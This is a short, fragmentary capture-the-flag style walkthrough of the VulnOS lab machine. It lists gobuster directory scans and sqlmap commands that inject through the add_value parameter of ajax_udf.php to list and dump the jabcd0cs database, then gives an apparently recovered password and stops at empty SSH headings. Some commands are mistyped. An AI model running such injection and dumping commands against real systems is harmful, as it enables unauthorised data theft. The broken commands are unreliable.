VulnOS Walkthrough
Scanning Network:
Directory busting:
gobuster dir -u http://192.168.1.7 -w /usr/share/wordlists/dirb/common.txt -x html,bat,php,txt
phase2:direcctory gobuster dir -u http://192.168.1.7/jabc -w /usr/share/wordlists/dirb/common.txt -x html,bat,php,txt
Reference:
also mention /jabcdocs
Sqlmap:::
sqlmap -u “http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -dbs -dbms=mysql
Reference:::-dbs
sqlmap -u “http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -dbms=mysql
not working like above….
— — — — — — — — — — — — — — — — — — — — — —
sqlmap -u “http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs — dump
webmin1980
Ssh connection::
Kali machine:(without connecting ssh connection terminal)
Now ssh terminal: